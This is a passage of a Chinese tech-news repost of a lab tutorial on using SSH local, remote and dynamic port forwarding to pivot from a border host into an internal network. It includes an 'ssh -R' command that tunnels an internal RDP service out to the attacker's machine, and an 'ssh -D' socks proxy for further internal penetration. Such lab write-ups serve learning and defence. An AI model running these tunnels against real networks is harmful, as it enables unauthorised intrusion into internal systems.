江苏龙网

  1. 首页 > 资讯 > 科技 > >

|关于内网中SSH协议的隧道利用方式( 二 )


|关于内网中SSH协议的隧道利用方式
本文插图

当连接192.168.3.131的13389端口时 , 通过ssh协议与边界跳板192.168.3.134连接 , 然后10.10.10.130发送相应流量连接至内网10.10.10.128攻击机 随机端口与边界跳板相连接
|关于内网中SSH协议的隧道利用方式
本文插图

边界跳板 内网随机端口与内网web3389连接
|关于内网中SSH协议的隧道利用方式
本文插图

内网web 3389端口与边界跳板连接
|关于内网中SSH协议的隧道利用方式
本文插图

No.4 远程转发
攻击机:192.168.3.131
内网边界:10.10.10.131
内网web:10.10.10.128
这里注意 , 攻击机不能访问内网机器 , 内网边界可访问外网攻击机(可以从内网边界ssh到攻击机上) , 但内网web服务器不能访问攻击机
以内网边界为跳板 , 将192.168.3.131的33389端口流量转发到内网web的3389端口 , 访问33389端口就可以访问内网web的3389的远程桌面
内网边界执行如下命令:
ssh -CfNg -R 33389:10.10.10.128:3389 root@192.168.3.131
33389(攻击机端口) 10.10.10.128(目标主机) 3389(目标端口) 192.168.3.131(攻击机IP)
|关于内网中SSH协议的隧道利用方式
本文插图

攻击机内如下接入:rdesktop 127.0.0.1:33389
|关于内网中SSH协议的隧道利用方式
本文插图

攻击机 22端口与内网边界相连接 , 内网出来的流量均会议22端口进行传输
|关于内网中SSH协议的隧道利用方式
本文插图

内网边界 内网边界是可以访问攻击机的 , 此时边界随机端口将会连接攻击机的22端口
|关于内网中SSH协议的隧道利用方式
本文插图

内网web 与边界随机端口建立连接
|关于内网中SSH协议的隧道利用方式
本文插图

No.5 动态转发
攻击机:192.168.3.131
内网边界:192.168.3.134 10.10.10.131
内网web:10.10.10.128
在攻击机上执行如下 , 创建socks代理 , 需要内网边界的密码:
ssh -CfNg -D 60011 root@192.168.3.134
60011(socks代理的端口 , 后期以攻击机的ip与该60011端口接入内网即可)
|关于内网中SSH协议的隧道利用方式
本文插图

浏览器配置代理 , 接入内网web资源(此次非内网边界):
|关于内网中SSH协议的隧道利用方式
本文插图

同样可以以此代理地址将其他工具接入内网 , 进一步内网渗透 , 在此不再赘述
|关于内网中SSH协议的隧道利用方式
本文插图


推荐阅读


上一篇:互联网|小袜子套上大数据,这里的新旧动能转换有看头

下一篇:中国新闻网|一箭三星 中国成功发射资源三号03星等三颗卫星